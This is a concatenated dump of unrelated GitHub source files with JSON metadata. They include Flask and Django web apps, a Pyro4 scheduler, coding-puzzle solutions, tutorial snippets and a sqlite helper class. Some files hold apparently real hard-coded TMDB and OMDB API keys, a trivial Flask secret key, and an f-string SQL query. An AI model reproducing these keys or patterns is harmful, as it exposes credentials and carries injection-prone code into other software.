allow_blank=True\n )\n sw_id = QuerySelectField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.all(),\n get_label='sw_company_product',\n allow_blank=True\n )\n crops_id = QuerySelectField(\n 'Related Crops', \n query_factory=lambda: Crops.query.all(),\n get_label='crop_name',\n allow_blank=True\n )\n company_id = QuerySelectField(\n 'Related Company', \n query_factory=lambda: Companies.query.all(),\n get_label='company_name',\n allow_blank=True\n )\n spell_name = StringField(\n 'Name of Magickal Intervention',\n [DataRequired()]\n )\n spell_type = MultiCheckboxField(\n 'Type of magickal intervention',\n choices=files\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_description = TextAreaField(\n 'Spell description',\n [DataRequired()]\n )\n spell_code = TextAreaField(\n 'Spell code',\n [DataRequired()]\n )\n spell_img = FileField(\n 'Company image',\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_locations = CountrySelectField(\n 'Locations for Magickal Intervention',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_networks = StringField(\n 'Covens and other connections',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\nclass LocationForm(FlaskForm):\n location_name = StringField(\n 'Name of Location',\n [DataRequired()]\n )\n history_list = QuerySelectField(\n 'history',\n query_factory=lambda: History.query.all(),\n get_label='history_name',\n allow_blank=True\n )\n \n submit = SubmitField('Submit')\n\nclass HistoryForm(FlaskForm):\n history_name = StringField(\n 'Name of History',\n [DataRequired()]\n )\n locations_list = QuerySelectField(\n 'locations',\n query_factory=lambda: Locations.query.all(),\n get_label='location_name',\n allow_blank=True\n )\n \n submit = SubmitField('Submit')\n\nclass SWCategoryForm(FlaskForm):\n sw_categories_name = StringField(\n 'Name of Software Category',\n [DataRequired()]\n )\n submit = SubmitField('Submit')\n\nclass HWCategoryForm(FlaskForm):\n hw_categories_name = StringField(\n 'Name of Hardware Category',\n [DataRequired()]\n )\n submit = SubmitField('Submit')\n\nclass RegistrationForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n password2 = PasswordField(\n 'Repeat Password', validators=[DataRequired(), EqualTo('password')])\n submit = SubmitField('Register')\n\n def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user is not None:\n raise ValidationError('Please use a different username.')\n\n def validate_email(self, email):\n user = User.query.filter_by(email=email.data).first()\n if user is not None:\n raise ValidationError('Please use a different email address.')\n\nclass LoginForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n remember_me = BooleanField('Remember Me')\n submit = SubmitField('Sign In')\n\nclass EditProfileForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n submit = SubmitField('Submit')\n\n def __init__(self, original_username, *args, **kwargs):\n super(EditProfileForm, self).__init__(*args, **kwargs)\n self.original_username = original_username\n\n def validate_username(self, username):\n if username.data != self.original_username:\n user = User.query.filter_by(username=self.username.data).first()\n if user is not None:\n raise ValidationError('Please use a different username.')","repo_name":"Coven-Intelligence/Insurgent-Ecologies","sub_path":"insurgentecologies/addagtech/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3595942891","text":"from flask import Flask, render_template, redirect, session\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport os\nimport random\n#############################\n# APP FLASK CONFIGURATION\napp = Flask(__name__)\napp.secret_key = \"..\"\n# DATABASE CONFIGURATION\nuri = os.environ.get('MONGO_DB_URI', \"mongodb://127.0.0.1\")\nclient = MongoClient(uri)\ndb = client.meli\n#############################\n\n\n@app.route(\"/\")\ndef meli_view():\n productos = list(db.productos.find())\n servicios = list(db.servicios.find())\n beneficios = list(db.beneficios.find())\n tiendas = list(db.tiendas.find())\n extras = list(db.extras.find())\n supermercado = list(db.supermercado.find())\n categorias = list(db.categorias.find())\n avisoPrincipal = db.avisoPrincipal.find()\n productos = db.productoNuevo.find()\n\n if not session.get('id'):\n session['id'] = random.randint(12345, 99999)\n return render_template(\"meli.html\",\n titulo=\"Mercado Libre 2.0 | by: Sr.Cthulhu ©\",\n productos=productos,\n servicios=servicios,\n beneficios=beneficios,\n tiendas=tiendas,\n extras=extras,\n supermercado=supermercado,\n categorias=categorias,\n avisoPrincipal=avisoPrincipal,\n id=session.get('id')\n )\n\n\n@app.route(\"/meli/aviso/\")\ndef meli_aviso_view(id):\n aviso = db.avisoPrincipal.find_one({'_id': ObjectId(id)})\n return render_template(\"meli_detalle.html\", aviso=aviso)\n\n\n@app.route(\"/meli/linkdecompra/\")\ndef meli_linkdecompra_view(id):\n\n linkdecompra = db.productoNuevo.find_one({'_id': ObjectId(id)})\n return render_template(\"meli_detalle.html\", linkdecompra=linkdecompra)\n\n\n@app.route(\"/add/\")\ndef add_product_to_cart(id):\n\n product = db.productoNuevo.find_one({'_id': ObjectId(id)})\n\n if not session.get('id'):\n return redirect('/')\n\n user = session.get('id')\n\n nuevo = {}\n nuevo['title'] = product['title']\n nuevo['cover'] = product['cover']\n nuevo['price'] = product['price']\n\n nuevo['user_id'] = user\n\n db.cart.insert_one(nuevo)\n\n return redirect('/cart')\n\n\n@app.route(\"/cart\")\ndef cart_view():\n if not session.get('id'):\n return redirect('/')\n user = session.get('id')\n\n productoagregado = list(db.cart.find({'user_id': user}))\n return render_template(\n \"cart.html\", productoagregado=productoagregado)\n\n\n@app.route(\"/checkout/\")\ndef check_view(id):\n user = session.get('id')\n\n compra = list(db.cart.find({'user_id': user}))\n # Imprime en el template lo sumado al carrito en la base de datos.\n return render_template(\"checkout.html\", compra=compra)\n","repo_name":"SrCthulhu/meli","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22923662644","text":"from __future__ import print_function\n\nimport random\nimport socket\nfrom Worker import Worker\nimport Pyro4\ntry:\n import queue # py3\nexcept ImportError:\n import Queue as queue # py2\n\nfrom Pyro4.util import SerializerBase\nfrom Job import Job\nSerializerBase.register_dict_to_class(\"Job.Job\", Job.from_dict)\n\n\nclass Scheduler(object):\n METHOD_RAND = \"RANDOM\"\n METHOD_TWO = \"CHOOSE_TWO\"\n METHOD_BATCH = \"BATCH\"\n METHOD_LATE = \"BATCH+LATE_BINDING\"\n\n def __init__(self, scheduling_method=METHOD_RAND, nameserver_hostname=\"newyork\", scheduler_number=1):\n self.no_of_workers_per_scheduler = 10\n self.scheduling_method = scheduling_method\n print(\"Scheduling method: \", self.scheduling_method)\n\n # Number of the scheduler\n self.scheduler_number = scheduler_number\n\n # List of jobs that have been scheduled/reserved\n self.in_progress_jobs = {}\n self.workers = []\n self.assigned_tasks = []\n self.name_server = Pyro4.locateNS(nameserver_hostname)\n\n def set_method(self, method):\n self.scheduling_method = method\n\n if method == Scheduler.METHOD_LATE:\n for worker in self.workers:\n worker.set_late_binding(True)\n else:\n for worker in self.workers:\n worker.set_late_binding(False)\n\n def update_workers(self):\n # List all sparrow workers (i.e. sparrow.worker.arizona)\n worker_dict = self.name_server.list('sparrow.worker')\n\n new_workers = []\n # Add new workers\n for key in worker_dict:\n worker = Pyro4.Proxy(worker_dict[key])\n new_workers.append(worker)\n if worker not in self.workers:\n self.workers.append(worker)\n\n # Clean nameserver\n missing_nodes = list(set(self.workers) - set(new_workers))\n for missing_node in missing_nodes:\n print(\"Trimming %s from nameserver.\" % (missing_node.name))\n self.name_server.remove(name=missing_node.name)\n # Remove local\n self.workers.remove(missing_node)\n\n # print(self.workers)\n\n def schedule(self, job):\n \"\"\"\n Schedules a job, which has been broken down into tasks\n :param job: A Job object\n \"\"\"\n # print(\"Scheduling job\")\n self.update_workers()\n self.no_of_workers_per_scheduler = len(self.workers)\n self.in_progress_jobs[job.id] = job\n\n self.method_chosen(job)\n\n # For late binding, worker asks for permission to start task\n def request_task(self, job_id, task_id):\n task_requested = [job_id, task_id]\n if task_requested in self.assigned_tasks:\n self.assigned_tasks.remove(task_requested)\n return True\n else:\n return False\n\n def task_completed(self, job_id, task_id):\n if job_id not in self.in_progress_jobs:\n print(\"Job not found\", job_id)\n return\n if task_id not in self.in_progress_jobs[job_id].tasks:\n print(\"Task not found in \", self.in_progress_jobs[job_id])\n return\n\n print(\"Worker completed (job,task) \", job_id, task_id)\n self.in_progress_jobs[job_id].tasks.pop(task_id)\n\n if len(self.in_progress_jobs[job_id].tasks) == 0:\n print(\"Job %d completed\" % (self.in_progress_jobs[job_id].id))\n self.in_progress_jobs.pop(job_id)\n\n # This method defines which method is being used to assign jobs\n def method_chosen(self, job):\n if self.scheduling_method == Scheduler.METHOD_RAND:\n self.set_method(Scheduler.METHOD_RAND)\n self.rand(job)\n elif self.scheduling_method == Scheduler.METHOD_TWO:\n self.set_method(Scheduler.METHOD_TWO)\n self.choose_two(job)\n elif self.scheduling_method == Scheduler.METHOD_BATCH:\n self.set_method(Scheduler.METHOD_BATCH)\n self.batch(job, False)\n elif self.scheduling_method == Scheduler.METHOD_LATE:\n self.set_method(Scheduler.METHOD_LATE)\n self.batch(job, True)\n\n # Implements random choosing of workers for tasks\n def rand(self, job):\n print(\"Random method\")\n\n for task_id in job.tasks:\n sent = False\n while not sent:\n random_worker = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n try:\n self.workers[random_worker].add_task(job.id, task_id, job.tasks[task_id])\n sent = True\n except Exception as e:\n pass\n\n # Implements choose two method of assigning tasks to workers\n def choose_two(self, job):\n print(\"Choose Two method\")\n for task_id in job.tasks:\n rand_work1 = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n done = False\n while not done:\n rand_work2 = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n if rand_work1 != rand_work2:\n done = True\n work1_load = self.workers[rand_work1].find_load()\n work2_load = self.workers[rand_work2].find_load()\n if int(work1_load) < int(work2_load):\n self.workers[rand_work1].add_task(job.id, task_id, job.tasks[task_id])\n else:\n self.workers[rand_work2].add_task(job.id, task_id, job.tasks[task_id])\n\n # Implements batch processing method of assigning tasks to workers\n # as well as batch processing plus late binding\n def batch(self, job, late_binding):\n if late_binding:\n print(\"Batch processing with late binding\")\n else:\n print(\"Batch processing\")\n\n choose = 2\n\n if len(self.workers) >= (choose * len(job.tasks)):\n print(\"Number of workers is adequate\")\n random_workers = self.pick_random_workers(choose * len(job.tasks))\n\n if late_binding:\n for task_id in job.tasks:\n if [job.id, task_id] not in self.assigned_tasks:\n self.assigned_tasks.append([job.id, task_id])\n for each_worker in random_workers:\n self.workers[each_worker].add_task(job.id, task_id, job.tasks[task_id])\n else:\n worker_load = []\n for each in random_workers:\n worker_load.append([self.workers[each].find_load(), each ])\n worker_load.sort()\n for task_id in job.tasks:\n worker_id = worker_load[task_id]\n self.workers[worker_id[1]].add_task(job.id, task_id, job.tasks[task_id])\n\n else:\n print(\"Number of workers not adequate\")\n task_idx = 0\n while task_idx < len(job.tasks):\n num_workers = min(((len(job.tasks)-task_idx) * choose), len(self.workers))\n random_worker_indices = self.pick_random_workers(num_workers)\n\n if late_binding:\n for task_id in range(len(random_worker_indices)/choose):\n if [job.id, task_idx] not in self.assigned_tasks:\n self.assigned_tasks.append([job.id, task_idx])\n for each_worker_index in random_worker_indices:\n self.workers[each_worker_index].add_task(job.id, task_idx, job.tasks[task_idx])\n task_idx += 1\n else:\n worker_load = []\n for random_work_idx in random_worker_indices:\n worker_load.append([self.workers[random_work_idx].find_load(), random_work_idx ])\n worker_load.sort()\n for task_id in range(len(random_worker_indices)/choose):\n worker_id = worker_load[task_id]\n self.workers[worker_id[1]].add_task(job.id, task_idx, job.tasks[task_idx])\n task_idx += 1\n\n # Prints Random servers to to probe\n def pick_random_workers(self,no_of_workers_to_probe):\n\n random_servers = []\n while no_of_workers_to_probe > 0:\n rand_work1 = random.randint(0, len(self.workers)-1)\n if rand_work1 not in random_servers:\n random_servers.append(rand_work1)\n no_of_workers_to_probe -= 1\n # print(str(random_servers))\n return random_servers\n\n\nif __name__ == \"__main__\":\n scheduler_number = 1\n hostname = socket.gethostname()\n name_in_nameserver = \"sparrow.scheduler.\" + str(int(scheduler_number))\n Pyro4.config.SERVERTYPE = \"multiplex\"\n Pyro4.Daemon.serveSimple(\n {\n Scheduler(Scheduler.METHOD_RAND): name_in_nameserver\n },\n host=hostname\n )\n","repo_name":"ahollenbach/sparrow","sub_path":"src/Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18013689220","text":"# https://leetcode.com/explore/interview/card/bloomberg/68/array-and-strings/373/\n\nclass Solution:\n def firstUniqChar(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n charCount = collections.defaultdict(int)\n for i in s:\n charCount[i] += 1\n for j, v in enumerate(s):\n if charCount[v] == 1:\n return j\n return -1\n # Two pass through string and counted occurances. Faster than ~81% of submissions\n\n def firstUniqCharOneLine(self, s):\n return min([s.find(c) for c in string.ascii_lowercase if s.count(c)==1] or [-1])\n # Check if count of character is 1 for all all letters in the alphabet if the letter is in the string\n ","repo_name":"vincentt117/coding_challenge","sub_path":"lc_first_unqiue_character_in_a_string.py","file_name":"lc_first_unqiue_character_in_a_string.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18241803814","text":"import asyncio\nimport os\n\nimport cloudpickle\nimport pytest\nfrom debug_utils import ITERATIONS, parse_args, set_rmm, start_process\nfrom utils import recv, send\n\nfrom distributed.comm.utils import to_frames\nfrom distributed.protocol import to_serialize\n\nimport ucp\nfrom ucp.utils import get_event_loop\n\ncmd = \"nvidia-smi nvlink --setcontrol 0bz\" # Get output in bytes\n# subprocess.check_call(cmd, shell=True)\n\npynvml = pytest.importorskip(\"pynvml\", reason=\"PYNVML not installed\")\n\n\nasync def get_ep(name, port):\n addr = ucp.get_address()\n ep = await ucp.create_endpoint(addr, port)\n return ep\n\n\ndef server(env, port, func, verbose):\n # create listener receiver\n # write cudf object\n # confirm message is sent correctly\n\n os.environ.update(env)\n\n async def f(listener_port):\n # coroutine shows up when the client asks\n # to connect\n set_rmm()\n\n async def write(ep):\n\n print(\"CREATING CUDA OBJECT IN SERVER...\")\n cuda_obj_generator = cloudpickle.loads(func)\n cuda_obj = cuda_obj_generator()\n msg = {\"data\": to_serialize(cuda_obj)}\n frames = await to_frames(msg, serializers=(\"cuda\", \"dask\", \"pickle\"))\n while True:\n for i in range(ITERATIONS):\n print(\"ITER: \", i)\n # Send meta data\n await send(ep, frames)\n\n frames, msg = await recv(ep)\n\n print(\"CONFIRM RECEIPT\")\n await ep.close()\n break\n # lf.close()\n del msg\n del frames\n\n lf = ucp.create_listener(write, port=listener_port)\n try:\n while not lf.closed():\n await asyncio.sleep(0.1)\n except ucp.UCXCloseError:\n pass\n\n loop = get_event_loop()\n while True:\n loop.run_until_complete(f(port))\n\n\ndef main():\n args = parse_args(server_address=False)\n\n start_process(args, server)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rapidsai/ucx-py","sub_path":"debug-tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"72"} +{"seq_id":"2154864160","text":"import json\nimport os\nimport platform\n\nDEVELOPMENT = platform.system() == \"Windows\"\nROOT_DIRPATH = os.path.dirname(__file__)\nLOG_DIRPATH = os.path.join(ROOT_DIRPATH, \"log\")\n\nKEYS_PATH = os.path.join(ROOT_DIRPATH, \"keys.json\")\nLOG_FORMAT = \"%(asctime)s - %(levelname)s :: %(threadName)s :: %(name)s %(lineno)d :: %(message)s\"\nDATETIME_STANDARD_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\nDATETIME_STANDARD_FORMAT2 = \"%Y-%m-%dT%H:%M:%SZ\"\nDATETIME_STANDARD_SHOW_FORMAT = \"%d/%m/%Y %H:%M:%S\"\n\nTEMPLATES_FOLDER_PATH = os.path.join(ROOT_DIRPATH, \"templates\")\nSTATIC_FOLDER_PATH = os.path.join(ROOT_DIRPATH, \"static\")\n\nSPOTIFY_AUTH_TIMESPAN = 600\n\nCONFIGS_PATH = os.path.join(ROOT_DIRPATH, \"keys.json\")\nSPOTIFY_PATH = os.path.join(ROOT_DIRPATH, \"spotify.json\")\n\nos.makedirs(LOG_DIRPATH, exist_ok=True)\nLOG_OUTPUT_TO_CONSOLE = DEVELOPMENT\n\nwith open(CONFIGS_PATH, 'r') as f:\n CONFIGS = json.load(f)\n\nwith open(SPOTIFY_PATH, 'r') as f:\n SPOTIFY_DEFINITIONS = json.load(f)\n","repo_name":"alexregazzo/MusicManager","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15151585529","text":"N = int(input())\r\ninputs = [input() for _ in range(N)]\r\n\r\nused = [inputs[0]]\r\nfor i in range(1, N):\r\n if inputs[i-1][-1] != inputs[i][0] or inputs[i] in used:\r\n print('LOSE' if i % 2 == 0 else 'WIN')\r\n break\r\n else:\r\n used.append(inputs[i])\r\nelse:\r\n print('DRAW')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc014/B/4010544.py","file_name":"4010544.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23905856964","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Post, Rating, Comment\nfrom .forms import PostForm, CommentForm, RatingForm\nfrom django.db.models import Avg\nfrom django.views.generic import ListView\n\n\n@login_required\ndef post_list(request):\n posts = Post.objects.all()\n post_rating = Rating.objects.values_list('post_id').annotate(avg_rating=Avg('rating'))\n context = {\n 'posts': posts,\n 'post_rating': post_rating\n }\n return render(request, 'post_list.html', context)\n\n\n\n\n@login_required\ndef post_create(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('posts:post_list')\n else:\n form = PostForm()\n return render(request, 'post_form.html', {'form': form})\n\n\n@login_required\ndef post_edit(request, pk):\n post = Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('posts:post_list')\n else:\n form = PostForm(instance=post)\n return render(request, 'post_form.html', {'form': form})\n\n@login_required\ndef post_delete(request, pk):\n post = Post.objects.get(pk=pk)\n post.delete()\n return redirect('posts:post_list')\n\n@login_required\ndef add_comment_to_post(request, pk):\n post = Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.author = request.user\n comment.save()\n return redirect('posts:add_rating_to_post', pk=post.pk)\n else:\n return redirect('posts:post_list')\n else:\n form = CommentForm()\n return render(request, 'add_comment_to_post.html', {'form': form})\n\n@login_required\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n comments = post.comments.all()\n comment = Comment.objects.filter(post=post)\n ratings = Rating.objects.filter(post=post).all()\n rating = ratings.values_list('rating')\n average_rating = ratings.aggregate(Avg('rating'))['rating__avg']\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.user = request.user\n comment.save()\n return redirect('posts:post_detail', pk=post.pk)\n else:\n form = CommentForm()\n return render(request, 'post_detail.html', {'post': post, 'comments': comments, 'form': form, 'ratings': ratings, 'average_rating': average_rating, 'rating': rating})\n\n\n@login_required\ndef add_rating_to_post(request, pk, *args,**kwargs):\n post = Post.objects.get(pk=pk)\n comment = Comment.objects.filter(post=post)\n if request.method == 'POST':\n form = RatingForm(request.POST)\n if form.is_valid():\n rating = form.save(commit=False)\n rating.post = post\n rating.user = request.user\n rating.comments_id = comment.values_list('id').last()[0]\n rating.save()\n return redirect('posts:post_detail', pk=post.pk)\n else:\n return redirect('posts:post_list')\n else:\n form = RatingForm()\n return render(request, 'add_rating_to_post.html', {'form': form})\n\n\nclass SearchResultsView(ListView):\n model = Post\n template_name = 'search_results.html'\n def get_queryset(self): # новый\n query = self.request.GET.get('q')\n object_list = Post.objects.filter(school_name__icontains=query)\n return (object_list)","repo_name":"filipov0991/Django-Rating-school","sub_path":"service/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70800485034","text":"# tail recursion is a type of recursion in which parent recursion has nothing to do when execution of child recursion finishes\n# tail recursions exceuted fast when there input size is large\n# main reason for the tailrecursion is fast because the caller dosent want to save the state\n# tail recursion is one of the reason that quick sort is faster than merge sort \n# for example finding a tail recursive problem using tail recursive method\ndef fact(n,k):\n if n==0 or n==1:\n print(k)\n fact(n-1,n*k)\nn=int(input(\"enter your number for tail recursion\"))\nfact(n,1)\n\n","repo_name":"gokuljs/python-rev","sub_path":"geeks_for_geeks/recursion/tail_recursion.py","file_name":"tail_recursion.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21911625558","text":"# Try-Except Block:\ntry:\n # Code that may raise an exception\n result = 10 / 0\nexcept ZeroDivisionError:\n # Code to handle the ZeroDivisionError exception\n print(\"Division by zero is not allowed.\")\n\n\n# Handling Multiple Exceptions:\ntry:\n x = int(input(\"Enter a number: \"))\n result = 10 / x\nexcept ValueError:\n print(\"Invalid input. Please enter a number.\")\nexcept ZeroDivisionError:\n print(\"Division by zero is not allowed.\")\n\n\n# Handling All Exceptions:\n'''\ntry:\n # Code that may raise an exception\nexcept Exception as e:\n # Code to handle any exception\n print(\"An error occurred:\", e)\n\n'''\n\n\n# Finally Block:\n'''\ntry:\n # Code that may raise an exception\nexcept Exception as e:\n # Code to handle the exception\nfinally:\n # Code that will always execute\n\n'''\n","repo_name":"youseftareq33/Python_language","sub_path":"Python_Basic/12handelExption.py","file_name":"12handelExption.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40438099499","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-09-24 16:53:47\n# @Last Modified time: 2016-09-24 16:56:14\n# @FileName: 122.py\n\n\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n ans = 0\n for i in range(1, len(prices)):\n if prices[i - 1] < prices[i]:\n ans += prices[i] - prices[i - 1]\n return ans","repo_name":"LichAmnesia/LeetCode","sub_path":"python/122.py","file_name":"122.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33627517054","text":"# coding:utf-8\n\n# random.random 随机返回0~1之间的浮点数\n# random.uniform 产生一个a,b区间的随机浮点数\n# random.randint 产生一个a,b区间的随机整数\n# random.choice 返回对象中的一个随机元素\n# random.sample 随机返回对象中指定的元素,可以返多个\n# random.randrange 获取区间内的一个随机数,可传入一个步长来设置返回数的步长\n\nimport random\n\ngifts = ['iphone', 'ipad', 'iwatch', 'appletv']\n\n\ndef choice_gifts():\n data = random.choice(gifts)\n print(f'你抽中了{data}')\n\n\ndef choice_gift_new():\n count = random.randrange(0, 100, 1)\n # count =random.choice(range(0,100,1) 和上面这个效果等同\n print(count)\n if 0 <= count <= 50:\n print('你中了一个iphone')\n elif 50 < count <= 70:\n print('你中了一台iwatch')\n elif 70 < count <= 90:\n print('你中了一台appleTv')\n else:\n print('你中了一台appleCar')\n\n\nif __name__ == '__main__':\n choice_gift_new()","repo_name":"skyetang/py-useful","sub_path":"pack_animal/pack_random.py","file_name":"pack_random.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72630489834","text":"from app import db\nfrom models import User, Movie, Genre, Actor, Director, Writer\nimport requests\nimport pdb\n\nTMDB_BASE_URL = 'https://api.themoviedb.org/3'\nTMDB_API_KEY = '2c8276507ce2b6c8c6617c916d6fa4a1'\nOMDB_BASE_URL = 'http://www.omdbapi.com'\nOMDB_API_KEY = 'a2f9bc6'\n\n\ndef get_imdb_id(TMDB_id):\n imdb_id = requests.get(\n f'{TMDB_BASE_URL}/movie/{TMDB_id}',\n params={'api_key': TMDB_API_KEY}\n ).json()['imdb_id']\n\n return imdb_id\n\ndef get_movie(imdb_id):\n movie = requests.get(\n OMDB_BASE_URL,\n params={'apikey': OMDB_API_KEY, 'i': imdb_id, 'plot': 'full'}\n ).json()\n\n return movie\n\ndef add_directors(director_list, movie):\n for director in director_list:\n try:\n new_director = Director(name=director)\n db.session.add(new_director)\n db.session.commit()\n\n movie.directors.append(new_director)\n except Exception:\n db.session.rollback()\n continue\n return None\n\ndef add_actors(actor_list, movie):\n for actor in actor_list:\n try:\n new_actor = Actor(name=actor)\n db.session.add(new_actor)\n db.session.commit()\n\n movie.actors.append(new_actor)\n except Exception:\n db.session.rollback()\n continue\n return None\n\ndef add_writers(writer_list, movie):\n for writer in writer_list:\n try:\n new_writer = Writer(name=writer)\n db.session.add(new_writer)\n db.session.commit()\n\n movie.writers.append(new_writer)\n except Exception:\n db.session.rollback()\n continue\n return None\n\ndef create_motion_picture(id):\n all_genres = Genre.query.all()\n title = get_movie(id)['Title']\n plot = get_movie(id)['Plot']\n release_date = get_movie(id)['Released']\n runtime = get_movie(id)['Runtime'].split()[0]\n genre_names = get_movie(id)['Genre'].split()\n directors = set(get_movie(id)['Director'].split(','))\n writers = set(get_movie(id)['Writer'].split(','))\n actors = set(get_movie(id)['Actors'].split(','))\n poster = get_movie(id)['Poster']\n earnings = get_movie(id)['BoxOffice']\n imdb_rating = get_movie(id)['imdbRating']\n\n if runtime == 'N/A':\n runtime = -1\n else:\n try:\n runtime = int(runtime)\n except Exception:\n runtime = -1\n\n new_movie = Movie(title=title, plot=plot, release_date=release_date, runtime=runtime, poster=poster, earnings=earnings, imdb_rating=imdb_rating)\n for name in genre_names:\n for genre in all_genres:\n if name == genre.name:\n new_movie.genres.append(genre)\n elif name + ',' == genre.name:\n new_movie.genres.append(genre)\n \n add_directors(directors, new_movie)\n add_actors(actors, new_movie)\n add_writers(writers, new_movie)\n\n db.session.add(new_movie)\n\n\n","repo_name":"GrongDavid/Capstone---Movie-Hub","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5650193670","text":"def calculation():\r\n while True:\r\n inputNumbers=input(\"Enter Number: \")\r\n if inputNumbers =='stop' or inputNumbers== '': break\r\n value=float(inputNumbers)\r\n numList.append(value)\r\n return numList\r\n \r\ndef average(numList):\r\n try:\r\n average=float(sum(numList)/len(numList))\r\n print(\"Average of Numbers is: \",average)\r\n except:\r\n print(\"Application Closed\")\r\n \r\nnumList=list()\r\nnumList=calculation()\r\naverage(numList)\r\n ","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"6lists/Ex1_list5.py","file_name":"Ex1_list5.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72421066474","text":"import sqlite3, os\nfrom ..args import args\nfrom ..log import getLogger\nfrom ..const import TABLE_FITS, TABLE_OBSV, HDR_KEYS\nfrom .. import calc\n\n# Create module's logger\nlogger = getLogger(__name__)\n\n\n# IMPORTANT: put KEYWORDS in double-quotes, some have special characters (e.g. 'DATE-OBS').\n# Note: Use ..fits.printFitsHdr() for inspectation of fits files\n\n### OBSERVATION\n# Inserts row to observation table\n# see obsCreateTable for datatypes\n\n#\nclass ObservatoryDB:\n '''class for handling sqlite3 database file\n '''\n conn = None\n cursor = None\n obsvTable = None\n fitsTable = None\n\n def __init__(self, dbfile, obsvTable, fitsTable):\n ''':param dbfile: path for .db file\n :param obsvTable: tablename for Obsv objects\n :param fitsTable: tablename for FitsFile objects\n '''\n self.conn = sqlite3.connect(dbfile)\n self.cursor = self.conn.cursor()\n self.obsvTable = obsvTable\n self.fitsTable = fitsTable\n\n\n# def __query(self, string):\n# '''This method is for internal use only. Lets any command to be executed\n# in sqlite3 database.\n# :param string: SQL command to be issued.\n# :returns: result of the query (list, print for details)\n# '''\n# self.cursor.execute(string)\n# return self.cursor.fetchall()\n\n \n def queryHashRange(self, column, lowerHash, upperHash):\n '''Returns column(s) which are in range of specified hashes\n :param lowerHash: lowest hash allowed\n :param upperHash: upper limit of hashes, is forbidden\n :returns: result of the query (list, print for details)\n '''\n self.cursor.execute(\n f'SELECT {column} FROM obsv WHERE ({lowerHash}<=HASH and HASH<{upperHash})'\n )\n return 